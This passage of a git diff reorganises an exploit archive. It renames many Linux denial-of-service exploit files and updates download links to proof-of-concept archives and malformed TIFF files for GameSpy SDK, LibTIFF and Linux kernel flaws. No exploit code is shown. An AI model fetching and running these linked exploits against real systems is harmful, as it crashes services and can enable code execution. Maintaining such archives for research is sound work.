exploits/linux/dos/22294.c diff --git a/platforms/linux/dos/22352.txt b/exploits/linux/dos/22352.txt similarity index 100% rename from platforms/linux/dos/22352.txt rename to exploits/linux/dos/22352.txt diff --git a/platforms/linux/dos/22370.txt b/exploits/linux/dos/22370.txt similarity index 100% rename from platforms/linux/dos/22370.txt rename to exploits/linux/dos/22370.txt diff --git a/platforms/linux/dos/22406.txt b/exploits/linux/dos/22406.txt similarity index 100% rename from platforms/linux/dos/22406.txt rename to exploits/linux/dos/22406.txt diff --git a/platforms/linux/dos/22433.pl b/exploits/linux/dos/22433.pl similarity index 100% rename from platforms/linux/dos/22433.pl rename to exploits/linux/dos/22433.pl diff --git a/platforms/linux/dos/22446.txt b/exploits/linux/dos/22446.txt similarity index 100% rename from platforms/linux/dos/22446.txt rename to exploits/linux/dos/22446.txt diff --git a/platforms/linux/dos/22508.sh b/exploits/linux/dos/22508.sh similarity index 100% rename from platforms/linux/dos/22508.sh rename to exploits/linux/dos/22508.sh diff --git a/platforms/linux/dos/22527.c b/exploits/linux/dos/22527.c similarity index 100% rename from platforms/linux/dos/22527.c rename to exploits/linux/dos/22527.c diff --git a/platforms/linux/dos/22537.c b/exploits/linux/dos/22537.c similarity index 100% rename from platforms/linux/dos/22537.c rename to exploits/linux/dos/22537.c diff --git a/platforms/linux/dos/22560.txt b/exploits/linux/dos/22560.txt similarity index 100% rename from platforms/linux/dos/22560.txt rename to exploits/linux/dos/22560.txt diff --git a/platforms/linux/dos/22619.txt b/exploits/linux/dos/22619.txt similarity index 100% rename from platforms/linux/dos/22619.txt rename to exploits/linux/dos/22619.txt diff --git a/platforms/linux/dos/22624.c b/exploits/linux/dos/22624.c similarity index 100% rename from platforms/linux/dos/22624.c rename to exploits/linux/dos/22624.c diff --git a/platforms/linux/dos/22700.c b/exploits/linux/dos/22700.c similarity index 100% rename from platforms/linux/dos/22700.c rename to exploits/linux/dos/22700.c diff --git a/platforms/linux/dos/22701.c b/exploits/linux/dos/22701.c similarity index 100% rename from platforms/linux/dos/22701.c rename to exploits/linux/dos/22701.c diff --git a/platforms/linux/dos/22796.php b/exploits/linux/dos/22796.php similarity index 100% rename from platforms/linux/dos/22796.php rename to exploits/linux/dos/22796.php diff --git a/platforms/linux/dos/22800.txt b/exploits/linux/dos/22800.txt similarity index 100% rename from platforms/linux/dos/22800.txt rename to exploits/linux/dos/22800.txt diff --git a/platforms/linux/dos/22801.txt b/exploits/linux/dos/22801.txt similarity index 100% rename from platforms/linux/dos/22801.txt rename to exploits/linux/dos/22801.txt diff --git a/platforms/linux/dos/22802.txt b/exploits/linux/dos/22802.txt similarity index 100% rename from platforms/linux/dos/22802.txt rename to exploits/linux/dos/22802.txt diff --git a/platforms/linux/dos/22803.txt b/exploits/linux/dos/22803.txt similarity index 100% rename from platforms/linux/dos/22803.txt rename to exploits/linux/dos/22803.txt diff --git a/platforms/linux/dos/22814.txt b/exploits/linux/dos/22814.txt similarity index 100% rename from platforms/linux/dos/22814.txt rename to exploits/linux/dos/22814.txt diff --git a/platforms/linux/dos/22839.c b/exploits/linux/dos/22839.c similarity index 100% rename from platforms/linux/dos/22839.c rename to exploits/linux/dos/22839.c diff --git a/platforms/linux/dos/22846.pl b/exploits/linux/dos/22846.pl similarity index 100% rename from platforms/linux/dos/22846.pl rename to exploits/linux/dos/22846.pl diff --git a/platforms/linux/dos/22897.c b/exploits/linux/dos/22897.c similarity index 100% rename from platforms/linux/dos/22897.c rename to exploits/linux/dos/22897.c diff --git a/platforms/linux/dos/22902.sh b/exploits/linux/dos/22902.sh similarity index 100% rename from platforms/linux/dos/22902.sh rename to exploits/linux/dos/22902.sh diff --git a/platforms/linux/dos/22904.py b/exploits/linux/dos/22904.py similarity index 100% rename from platforms/linux/dos/22904.py rename to exploits/linux/dos/22904.py diff --git a/platforms/linux/dos/22938.py b/exploits/linux/dos/22938.py similarity index 100% rename from platforms/linux/dos/22938.py rename to exploits/linux/dos/22938.py diff --git a/platforms/linux/dos/22952.txt b/exploits/linux/dos/22952.txt similarity index 100% rename from platforms/linux/dos/22952.txt rename to exploits/linux/dos/22952.txt diff --git a/platforms/linux/dos/22981.c b/exploits/linux/dos/22981.c similarity index 100% rename from platforms/linux/dos/22981.c rename to exploits/linux/dos/22981.c diff --git a/platforms/linux/dos/22982.pl b/exploits/linux/dos/22982.pl similarity index 100% rename from platforms/linux/dos/22982.pl rename to exploits/linux/dos/22982.pl diff --git a/platforms/linux/dos/23048.txt b/exploits/linux/dos/23048.txt similarity index 100% rename from platforms/linux/dos/23048.txt rename to exploits/linux/dos/23048.txt diff --git a/platforms/linux/dos/23075.pl b/exploits/linux/dos/23075.pl similarity index 100% rename from platforms/linux/dos/23075.pl rename to exploits/linux/dos/23075.pl diff --git a/platforms/linux/dos/23076.pl b/exploits/linux/dos/23076.pl similarity index 100% rename from platforms/linux/dos/23076.pl rename to exploits/linux/dos/23076.pl diff --git a/platforms/linux/dos/23078.txt b/exploits/linux/dos/23078.txt similarity index 100% rename from platforms/linux/dos/23078.txt rename to exploits/linux/dos/23078.txt diff --git a/platforms/linux/dos/23112.txt b/exploits/linux/dos/23112.txt similarity index 100% rename from platforms/linux/dos/23112.txt rename to exploits/linux/dos/23112.txt diff --git a/platforms/linux/dos/23116.pl b/exploits/linux/dos/23116.pl similarity index 100% rename from platforms/linux/dos/23116.pl rename to exploits/linux/dos/23116.pl diff --git a/platforms/linux/dos/23138.txt b/exploits/linux/dos/23138.txt similarity index 100% rename from platforms/linux/dos/23138.txt rename to exploits/linux/dos/23138.txt diff --git a/platforms/linux/dos/23170.c b/exploits/linux/dos/23170.c similarity index 100% rename from platforms/linux/dos/23170.c rename to exploits/linux/dos/23170.c diff --git a/platforms/linux/dos/23172.txt b/exploits/linux/dos/23172.txt similarity index 100% rename from platforms/linux/dos/23172.txt rename to exploits/linux/dos/23172.txt diff --git a/platforms/linux/dos/23200.txt b/exploits/linux/dos/23200.txt similarity index 100% rename from platforms/linux/dos/23200.txt rename to exploits/linux/dos/23200.txt diff --git a/platforms/linux/dos/23239.c b/exploits/linux/dos/23239.c similarity index 100% rename from platforms/linux/dos/23239.c rename to exploits/linux/dos/23239.c diff --git a/platforms/linux/dos/23245.pl b/exploits/linux/dos/23245.pl similarity index 100% rename from platforms/linux/dos/23245.pl rename to exploits/linux/dos/23245.pl diff --git a/platforms/linux/dos/23274.pl b/exploits/linux/dos/23274.pl similarity index 100% rename from platforms/linux/dos/23274.pl rename to exploits/linux/dos/23274.pl diff --git a/platforms/linux/dos/23305.c b/exploits/linux/dos/23305.c similarity index 100% rename from platforms/linux/dos/23305.c rename to exploits/linux/dos/23305.c diff --git a/platforms/linux/dos/23347.txt b/exploits/linux/dos/23347.txt similarity index 100% rename from platforms/linux/dos/23347.txt rename to exploits/linux/dos/23347.txt diff --git a/platforms/linux/dos/23348.txt b/exploits/linux/dos/23348.txt similarity index 100% rename from platforms/linux/dos/23348.txt rename to exploits/linux/dos/23348.txt diff --git a/platforms/linux/dos/23349.txt b/exploits/linux/dos/23349.txt similarity index 100% rename from platforms/linux/dos/23349.txt rename to exploits/linux/dos/23349.txt diff --git a/platforms/linux/dos/23375.txt b/exploits/linux/dos/23375.txt similarity index 100% rename from platforms/linux/dos/23375.txt rename to exploits/linux/dos/23375.txt diff --git a/platforms/linux/dos/23391.txt b/exploits/linux/dos/23391.txt similarity index 100% rename from platforms/linux/dos/23391.txt rename to exploits/linux/dos/23391.txt diff --git a/platforms/linux/dos/23393.c b/exploits/linux/dos/23393.c similarity index 100% rename from platforms/linux/dos/23393.c rename to exploits/linux/dos/23393.c diff --git a/platforms/linux/dos/23427.txt b/exploits/linux/dos/23427.txt similarity index 96% rename from platforms/linux/dos/23427.txt rename to exploits/linux/dos/23427.txt index 0f809a628..159dc6cb7 100644 --- a/platforms/linux/dos/23427.txt +++ b/exploits/linux/dos/23427.txt @@ -52,4 +52,4 @@ si_addr:$2 = (void *) 0xaf625080 Proof of concept included. http://www41.zippyshare.com/v/13083235/file.html -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23427.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23427.rar \ No newline at end of file diff --git a/platforms/linux/dos/23438.pl b/exploits/linux/dos/23438.pl similarity index 100% rename from platforms/linux/dos/23438.pl rename to exploits/linux/dos/23438.pl diff --git a/platforms/linux/dos/23452.txt b/exploits/linux/dos/23452.txt similarity index 100% rename from platforms/linux/dos/23452.txt rename to exploits/linux/dos/23452.txt diff --git a/platforms/linux/dos/23523.c b/exploits/linux/dos/23523.c similarity index 100% rename from platforms/linux/dos/23523.c rename to exploits/linux/dos/23523.c diff --git a/platforms/linux/dos/23539.txt b/exploits/linux/dos/23539.txt similarity index 100% rename from platforms/linux/dos/23539.txt rename to exploits/linux/dos/23539.txt diff --git a/platforms/linux/dos/236.sh b/exploits/linux/dos/236.sh similarity index 100% rename from platforms/linux/dos/236.sh rename to exploits/linux/dos/236.sh diff --git a/platforms/linux/dos/23662.c b/exploits/linux/dos/23662.c similarity index 100% rename from platforms/linux/dos/23662.c rename to exploits/linux/dos/23662.c diff --git a/platforms/linux/dos/23667.txt b/exploits/linux/dos/23667.txt similarity index 100% rename from platforms/linux/dos/23667.txt rename to exploits/linux/dos/23667.txt diff --git a/platforms/linux/dos/23690.txt b/exploits/linux/dos/23690.txt similarity index 100% rename from platforms/linux/dos/23690.txt rename to exploits/linux/dos/23690.txt diff --git a/platforms/linux/dos/23757.txt b/exploits/linux/dos/23757.txt similarity index 91% rename from platforms/linux/dos/23757.txt rename to exploits/linux/dos/23757.txt index 579b01b62..d083c5539 100644 --- a/platforms/linux/dos/23757.txt +++ b/exploits/linux/dos/23757.txt @@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a remote denial of service Exploitation of this issue may cause the affected GameSpy developed game to crash, denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23757.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23757.zip \ No newline at end of file diff --git a/platforms/linux/dos/23779.txt b/exploits/linux/dos/23779.txt similarity index 100% rename from platforms/linux/dos/23779.txt rename to exploits/linux/dos/23779.txt diff --git a/platforms/linux/dos/238.c b/exploits/linux/dos/238.c similarity index 100% rename from platforms/linux/dos/238.c rename to exploits/linux/dos/238.c diff --git a/platforms/linux/dos/23830.py b/exploits/linux/dos/23830.py similarity index 100% rename from platforms/linux/dos/23830.py rename to exploits/linux/dos/23830.py diff --git a/platforms/linux/dos/23884.txt b/exploits/linux/dos/23884.txt similarity index 100% rename from platforms/linux/dos/23884.txt rename to exploits/linux/dos/23884.txt diff --git a/platforms/linux/dos/23896.txt b/exploits/linux/dos/23896.txt similarity index 100% rename from platforms/linux/dos/23896.txt rename to exploits/linux/dos/23896.txt diff --git a/platforms/linux/dos/23943.txt b/exploits/linux/dos/23943.txt similarity index 100% rename from platforms/linux/dos/23943.txt rename to exploits/linux/dos/23943.txt diff --git a/platforms/linux/dos/23946.c b/exploits/linux/dos/23946.c similarity index 100% rename from platforms/linux/dos/23946.c rename to exploits/linux/dos/23946.c diff --git a/platforms/linux/dos/23999.txt b/exploits/linux/dos/23999.txt similarity index 100% rename from platforms/linux/dos/23999.txt rename to exploits/linux/dos/23999.txt diff --git a/platforms/linux/dos/24078.c b/exploits/linux/dos/24078.c similarity index 100% rename from platforms/linux/dos/24078.c rename to exploits/linux/dos/24078.c diff --git a/platforms/linux/dos/24095.txt b/exploits/linux/dos/24095.txt similarity index 100% rename from platforms/linux/dos/24095.txt rename to exploits/linux/dos/24095.txt diff --git a/platforms/linux/dos/24096.pl b/exploits/linux/dos/24096.pl similarity index 100% rename from platforms/linux/dos/24096.pl rename to exploits/linux/dos/24096.pl diff --git a/platforms/linux/dos/241.c b/exploits/linux/dos/241.c similarity index 100% rename from platforms/linux/dos/241.c rename to exploits/linux/dos/241.c diff --git a/platforms/linux/dos/24222.c b/exploits/linux/dos/24222.c similarity index 100% rename from platforms/linux/dos/24222.c rename to exploits/linux/dos/24222.c diff --git a/platforms/linux/dos/24346.txt b/exploits/linux/dos/24346.txt similarity index 100% rename from platforms/linux/dos/24346.txt rename to exploits/linux/dos/24346.txt diff --git a/platforms/linux/dos/24355.txt b/exploits/linux/dos/24355.txt similarity index 100% rename from platforms/linux/dos/24355.txt rename to exploits/linux/dos/24355.txt diff --git a/platforms/linux/dos/24358.txt b/exploits/linux/dos/24358.txt similarity index 100% rename from platforms/linux/dos/24358.txt rename to exploits/linux/dos/24358.txt diff --git a/platforms/linux/dos/24360.py b/exploits/linux/dos/24360.py similarity index 100% rename from platforms/linux/dos/24360.py rename to exploits/linux/dos/24360.py diff --git a/platforms/linux/dos/244.java b/exploits/linux/dos/244.java similarity index 100% rename from platforms/linux/dos/244.java rename to exploits/linux/dos/244.java diff --git a/platforms/linux/dos/24487.py b/exploits/linux/dos/24487.py similarity index 100% rename from platforms/linux/dos/24487.py rename to exploits/linux/dos/24487.py diff --git a/platforms/linux/dos/24569.txt b/exploits/linux/dos/24569.txt similarity index 100% rename from platforms/linux/dos/24569.txt rename to exploits/linux/dos/24569.txt diff --git a/platforms/linux/dos/24590.txt b/exploits/linux/dos/24590.txt similarity index 100% rename from platforms/linux/dos/24590.txt rename to exploits/linux/dos/24590.txt diff --git a/platforms/linux/dos/24599.txt b/exploits/linux/dos/24599.txt similarity index 100% rename from platforms/linux/dos/24599.txt rename to exploits/linux/dos/24599.txt diff --git a/platforms/linux/dos/24677.txt b/exploits/linux/dos/24677.txt similarity index 100% rename from platforms/linux/dos/24677.txt rename to exploits/linux/dos/24677.txt diff --git a/platforms/linux/dos/24696.c b/exploits/linux/dos/24696.c similarity index 100% rename from platforms/linux/dos/24696.c rename to exploits/linux/dos/24696.c diff --git a/platforms/linux/dos/24747.c b/exploits/linux/dos/24747.c similarity index 100% rename from platforms/linux/dos/24747.c rename to exploits/linux/dos/24747.c diff --git a/platforms/linux/dos/24755.java b/exploits/linux/dos/24755.java similarity index 100% rename from platforms/linux/dos/24755.java rename to exploits/linux/dos/24755.java diff --git a/platforms/linux/dos/24756.java b/exploits/linux/dos/24756.java similarity index 100% rename from platforms/linux/dos/24756.java rename to exploits/linux/dos/24756.java diff --git a/platforms/linux/dos/24777.txt b/exploits/linux/dos/24777.txt similarity index 100% rename from platforms/linux/dos/24777.txt rename to exploits/linux/dos/24777.txt diff --git a/platforms/linux/dos/24804.c b/exploits/linux/dos/24804.c similarity index 100% rename from platforms/linux/dos/24804.c rename to exploits/linux/dos/24804.c diff --git a/platforms/linux/dos/24815.txt b/exploits/linux/dos/24815.txt similarity index 92% rename from platforms/linux/dos/24815.txt rename to exploits/linux/dos/24815.txt index ebff97f9c..221c8286a 100644 --- a/platforms/linux/dos/24815.txt +++ b/exploits/linux/dos/24815.txt @@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a buffer overflow vulnerab Exploitation of this issue may allow attackers to execute arbitrary machine code in the context of the affected GameSpy developed game. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24815.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24815.zip \ No newline at end of file diff --git a/platforms/linux/dos/24828.txt b/exploits/linux/dos/24828.txt similarity index 100% rename from platforms/linux/dos/24828.txt rename to exploits/linux/dos/24828.txt diff --git a/platforms/linux/dos/24865.txt b/exploits/linux/dos/24865.txt similarity index 94% rename from platforms/linux/dos/24865.txt rename to exploits/linux/dos/24865.txt index 5291d996c..0a77bd68e 100644 --- a/platforms/linux/dos/24865.txt +++ b/exploits/linux/dos/24865.txt @@ -10,7 +10,7 @@ Sorry I forgot to write headers in previous mail. # Tested on: [GNU/Linux] # CVE : [CVE-2012-1663] -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24865.tar.bz2 +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24865.tar.bz2 I'm glad to share this to you guys. The test code was attached. You also could find them here: diff --git a/platforms/linux/dos/24951.pl b/exploits/linux/dos/24951.pl similarity index 100% rename from platforms/linux/dos/24951.pl rename to exploits/linux/dos/24951.pl diff --git a/platforms/linux/dos/25004.txt b/exploits/linux/dos/25004.txt similarity index 100% rename from platforms/linux/dos/25004.txt rename to exploits/linux/dos/25004.txt diff --git a/platforms/linux/dos/25017.txt b/exploits/linux/dos/25017.txt similarity index 100% rename from platforms/linux/dos/25017.txt rename to exploits/linux/dos/25017.txt diff --git a/platforms/linux/dos/25046.c b/exploits/linux/dos/25046.c similarity index 100% rename from platforms/linux/dos/25046.c rename to exploits/linux/dos/25046.c diff --git a/platforms/linux/dos/25047.c b/exploits/linux/dos/25047.c similarity index 100% rename from platforms/linux/dos/25047.c rename to exploits/linux/dos/25047.c diff --git a/platforms/linux/dos/25070.c b/exploits/linux/dos/25070.c similarity index 100% rename from platforms/linux/dos/25070.c rename to exploits/linux/dos/25070.c diff --git a/platforms/linux/dos/25076.c b/exploits/linux/dos/25076.c similarity index 100% rename from platforms/linux/dos/25076.c rename to exploits/linux/dos/25076.c diff --git a/platforms/linux/dos/25077.txt b/exploits/linux/dos/25077.txt similarity index 100% rename from platforms/linux/dos/25077.txt rename to exploits/linux/dos/25077.txt diff --git a/platforms/linux/dos/251.c b/exploits/linux/dos/251.c similarity index 100% rename from platforms/linux/dos/251.c rename to exploits/linux/dos/251.c diff --git a/platforms/linux/dos/25164.txt b/exploits/linux/dos/25164.txt similarity index 100% rename from platforms/linux/dos/25164.txt rename to exploits/linux/dos/25164.txt diff --git a/platforms/linux/dos/25234.sh b/exploits/linux/dos/25234.sh similarity index 100% rename from platforms/linux/dos/25234.sh rename to exploits/linux/dos/25234.sh diff --git a/platforms/linux/dos/25287.c b/exploits/linux/dos/25287.c similarity index 100% rename from platforms/linux/dos/25287.c rename to exploits/linux/dos/25287.c diff --git a/platforms/linux/dos/25303.txt b/exploits/linux/dos/25303.txt similarity index 100% rename from platforms/linux/dos/25303.txt rename to exploits/linux/dos/25303.txt diff --git a/platforms/linux/dos/25322.c b/exploits/linux/dos/25322.c similarity index 100% rename from platforms/linux/dos/25322.c rename to exploits/linux/dos/25322.c diff --git a/platforms/linux/dos/25334.txt b/exploits/linux/dos/25334.txt similarity index 100% rename from platforms/linux/dos/25334.txt rename to exploits/linux/dos/25334.txt diff --git a/platforms/linux/dos/25429.c b/exploits/linux/dos/25429.c similarity index 100% rename from platforms/linux/dos/25429.c rename to exploits/linux/dos/25429.c diff --git a/platforms/linux/dos/25465.txt b/exploits/linux/dos/25465.txt similarity index 100% rename from platforms/linux/dos/25465.txt rename to exploits/linux/dos/25465.txt diff --git a/platforms/linux/dos/25499.py b/exploits/linux/dos/25499.py similarity index 100% rename from platforms/linux/dos/25499.py rename to exploits/linux/dos/25499.py diff --git a/platforms/linux/dos/25525.c b/exploits/linux/dos/25525.c similarity index 100% rename from platforms/linux/dos/25525.c rename to exploits/linux/dos/25525.c diff --git a/platforms/linux/dos/25527.txt b/exploits/linux/dos/25527.txt similarity index 100% rename from platforms/linux/dos/25527.txt rename to exploits/linux/dos/25527.txt diff --git a/platforms/linux/dos/25647.sh b/exploits/linux/dos/25647.sh similarity index 100% rename from platforms/linux/dos/25647.sh rename to exploits/linux/dos/25647.sh diff --git a/platforms/linux/dos/25837.txt b/exploits/linux/dos/25837.txt similarity index 100% rename from platforms/linux/dos/25837.txt rename to exploits/linux/dos/25837.txt diff --git a/platforms/linux/dos/25943.txt b/exploits/linux/dos/25943.txt similarity index 100% rename from platforms/linux/dos/25943.txt rename to exploits/linux/dos/25943.txt diff --git a/platforms/linux/dos/26248.sh b/exploits/linux/dos/26248.sh similarity index 100% rename from platforms/linux/dos/26248.sh rename to exploits/linux/dos/26248.sh diff --git a/platforms/linux/dos/26249.c b/exploits/linux/dos/26249.c similarity index 100% rename from platforms/linux/dos/26249.c rename to exploits/linux/dos/26249.c diff --git a/platforms/linux/dos/26251.c b/exploits/linux/dos/26251.c similarity index 100% rename from platforms/linux/dos/26251.c rename to exploits/linux/dos/26251.c diff --git a/platforms/linux/dos/26340.c b/exploits/linux/dos/26340.c similarity index 100% rename from platforms/linux/dos/26340.c rename to exploits/linux/dos/26340.c diff --git a/platforms/linux/dos/26342.txt b/exploits/linux/dos/26342.txt similarity index 100% rename from platforms/linux/dos/26342.txt rename to exploits/linux/dos/26342.txt diff --git a/platforms/linux/dos/26382.c b/exploits/linux/dos/26382.c similarity index 100% rename from platforms/linux/dos/26382.c rename to exploits/linux/dos/26382.c diff --git a/platforms/linux/dos/26489.c b/exploits/linux/dos/26489.c similarity index 100% rename from platforms/linux/dos/26489.c rename to exploits/linux/dos/26489.c diff --git a/platforms/linux/dos/26601.pl b/exploits/linux/dos/26601.pl similarity index 100% rename from platforms/linux/dos/26601.pl rename to exploits/linux/dos/26601.pl diff --git a/platforms/linux/dos/26648.c b/exploits/linux/dos/26648.c similarity index 100% rename from platforms/linux/dos/26648.c rename to exploits/linux/dos/26648.c diff --git a/platforms/linux/dos/26666.c b/exploits/linux/dos/26666.c similarity index 100% rename from platforms/linux/dos/26666.c rename to exploits/linux/dos/26666.c diff --git a/platforms/linux/dos/26749.c b/exploits/linux/dos/26749.c similarity index 100% rename from platforms/linux/dos/26749.c rename to exploits/linux/dos/26749.c diff --git a/platforms/linux/dos/26811.c b/exploits/linux/dos/26811.c similarity index 100% rename from platforms/linux/dos/26811.c rename to exploits/linux/dos/26811.c diff --git a/platforms/linux/dos/26886.pl b/exploits/linux/dos/26886.pl similarity index 100% rename from platforms/linux/dos/26886.pl rename to exploits/linux/dos/26886.pl diff --git a/platforms/linux/dos/26887.rb b/exploits/linux/dos/26887.rb similarity index 100% rename from platforms/linux/dos/26887.rb rename to exploits/linux/dos/26887.rb diff --git a/platforms/linux/dos/26915.txt b/exploits/linux/dos/26915.txt similarity index 100% rename from platforms/linux/dos/26915.txt rename to exploits/linux/dos/26915.txt diff --git a/platforms/linux/dos/27031.c b/exploits/linux/dos/27031.c similarity index 100% rename from platforms/linux/dos/27031.c rename to exploits/linux/dos/27031.c diff --git a/platforms/linux/dos/27144.py b/exploits/linux/dos/27144.py similarity index 100% rename from platforms/linux/dos/27144.py rename to exploits/linux/dos/27144.py diff --git a/platforms/linux/dos/27145.txt b/exploits/linux/dos/27145.txt similarity index 100% rename from platforms/linux/dos/27145.txt rename to exploits/linux/dos/27145.txt diff --git a/platforms/linux/dos/27246.txt b/exploits/linux/dos/27246.txt similarity index 100% rename from platforms/linux/dos/27246.txt rename to exploits/linux/dos/27246.txt diff --git a/platforms/linux/dos/27253.txt b/exploits/linux/dos/27253.txt similarity index 100% rename from platforms/linux/dos/27253.txt rename to exploits/linux/dos/27253.txt diff --git a/platforms/linux/dos/27257.html b/exploits/linux/dos/27257.html similarity index 100% rename from platforms/linux/dos/27257.html rename to exploits/linux/dos/27257.html diff --git a/platforms/linux/dos/2730.pm b/exploits/linux/dos/2730.pm similarity index 100% rename from platforms/linux/dos/2730.pm rename to exploits/linux/dos/2730.pm diff --git a/platforms/linux/dos/274.c b/exploits/linux/dos/274.c similarity index 100% rename from platforms/linux/dos/274.c rename to exploits/linux/dos/274.c diff --git a/platforms/linux/dos/27425.txt b/exploits/linux/dos/27425.txt similarity index 100% rename from platforms/linux/dos/27425.txt rename to exploits/linux/dos/27425.txt diff --git a/platforms/linux/dos/27581.txt b/exploits/linux/dos/27581.txt similarity index 100% rename from platforms/linux/dos/27581.txt rename to exploits/linux/dos/27581.txt diff --git a/platforms/linux/dos/27635.txt b/exploits/linux/dos/27635.txt similarity index 100% rename from platforms/linux/dos/27635.txt rename to exploits/linux/dos/27635.txt diff --git a/platforms/linux/dos/27641.txt b/exploits/linux/dos/27641.txt similarity index 100% rename from platforms/linux/dos/27641.txt rename to exploits/linux/dos/27641.txt diff --git a/platforms/linux/dos/27670.txt b/exploits/linux/dos/27670.txt similarity index 100% rename from platforms/linux/dos/27670.txt rename to exploits/linux/dos/27670.txt diff --git a/platforms/linux/dos/27723.txt b/exploits/linux/dos/27723.txt similarity index 100% rename from platforms/linux/dos/27723.txt rename to exploits/linux/dos/27723.txt diff --git a/platforms/linux/dos/27762.txt b/exploits/linux/dos/27762.txt similarity index 76% rename from platforms/linux/dos/27762.txt rename to exploits/linux/dos/27762.txt index 6b1514606..523ffa91f 100644 --- a/platforms/linux/dos/27762.txt +++ b/exploits/linux/dos/27762.txt @@ -4,8 +4,8 @@ LibTIFF is affected by multiple denial-of-service vulnerabilities. An attacker can exploit these vulnerabilities to cause a denial of service in applications using the affected library. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-1.tiff.0 +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27762-1.tiff.0 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-2.tiff.1 +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27762-2.tiff.1 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-3.tiff.100 \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27762-3.tiff.100 \ No newline at end of file diff --git a/platforms/linux/dos/27764.txt b/exploits/linux/dos/27764.txt similarity index 90% rename from platforms/linux/dos/27764.txt rename to exploits/linux/dos/27764.txt index dcaebce2b..f2337b5ac 100644 --- a/platforms/linux/dos/27764.txt +++ b/exploits/linux/dos/27764.txt @@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to an integer-overflow vulnerab An attacker could exploit this vulnerability to execute arbitrary code in the context of the vulnerable application that uses the affected library. Failed exploit attempts will likely cause denial-of-service conditions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27764.tiff.11 \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27764.tiff.11 \ No newline at end of file diff --git a/platforms/linux/dos/27765.txt b/exploits/linux/dos/27765.txt similarity index 90% rename from platforms/linux/dos/27765.txt rename to exploits/linux/dos/27765.txt index 5366fda52..18e6d0ec2 100644 --- a/platforms/linux/dos/27765.txt +++ b/exploits/linux/dos/27765.txt @@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to a double-free vulnerability; Attackers may be able to exploit this issue to cause denial-of-service conditions in affected applications using a vulnerable version of the library; arbitrary code execution may also be possible. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27765.tiff.2 \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27765.tiff.2 \ No newline at end of file diff --git a/platforms/linux/dos/27778.txt b/exploits/linux/dos/27778.txt similarity index 100% rename from platforms/linux/dos/27778.txt rename to exploits/linux/dos/27778.txt diff --git a/platforms/linux/dos/27791.txt b/exploits/linux/dos/27791.txt similarity index 100% rename from platforms/linux/dos/27791.txt rename to exploits/linux/dos/27791.txt diff --git a/platforms/linux/dos/27856.txt b/exploits/linux/dos/27856.txt similarity index 100% rename from platforms/linux/dos/27856.txt rename to exploits/linux/dos/27856.txt diff --git a/platforms/linux/dos/27875.c b/exploits/linux/dos/27875.c similarity index 100% rename from platforms/linux/dos/27875.c rename to exploits/linux/dos/27875.c diff --git a/platforms/linux/dos/27903.txt b/exploits/linux/dos/27903.txt similarity index 100% rename from platforms/linux/dos/27903.txt rename to exploits/linux/dos/27903.txt diff --git a/platforms/linux/dos/27925.txt b/exploits/linux/dos/27925.txt similarity index 92% rename from platforms/linux/dos/27925.txt rename to exploits/linux/dos/27925.txt index 40c4ec3ca..61ab83973 100644 --- a/platforms/linux/dos/27925.txt +++ b/exploits/linux/dos/27925.txt @@ -6,4 +6,4 @@ This vulnerability allows local users to cause a kernel panic, denying further s This issue affects Linux kernel versions 2.6.15 through 2.6.17-rc5 on multiprocessor computers running SMP kernels. Other kernel versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27925.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27925.tgz \ No newline at end of file diff --git a/platforms/linux/dos/27981.c b/exploits/linux/dos/27981.c similarity index 100% rename from platforms/linux/dos/27981.c rename to exploits/linux/dos/27981.c diff --git a/platforms/linux/dos/28026.txt b/exploits/linux/dos/28026.txt similarity index 100% rename from platforms/linux/dos/28026.txt rename to exploits/linux/dos/28026.txt diff --git a/platforms/linux/dos/28077.txt b/exploits/linux/dos/28077.txt similarity index 100% rename from platforms/linux/dos/28077.txt rename to exploits/linux/dos/28077.txt diff --git a/platforms/linux/dos/28160.txt b/exploits/linux/dos/28160.txt similarity index 100% rename from platforms/linux/dos/28160.txt rename to exploits/linux/dos/28160.txt diff --git a/platforms/linux/dos/28220.txt b/exploits/linux/dos/28220.txt similarity index 100% rename from platforms/linux/dos/28220.txt rename to exploits/linux/dos/28220.txt diff --git a/platforms/linux/dos/28234.txt b/exploits/linux/dos/28234.txt similarity index 100% rename from platforms/linux/dos/28234.txt rename to exploits/linux/dos/28234.txt diff --git a/platforms/linux/dos/28257.txt b/exploits/linux/dos/28257.txt similarity index 100% rename from platforms/linux/dos/28257.txt rename to exploits/linux/dos/28257.txt diff --git a/platforms/linux/dos/28338.txt b/exploits/linux/dos/28338.txt similarity index 100% rename from platforms/linux/dos/28338.txt rename to exploits/linux/dos/28338.txt diff --git a/platforms/linux/dos/28348.txt b/exploits/linux/dos/28348.txt similarity index 94% rename from platforms/linux/dos/28348.txt rename to exploits/linux/dos/28348.txt index 0d7604f64..c3145d081 100644 --- a/platforms/linux/dos/28348.txt +++ b/exploits/linux/dos/28348.txt @@ -8,4 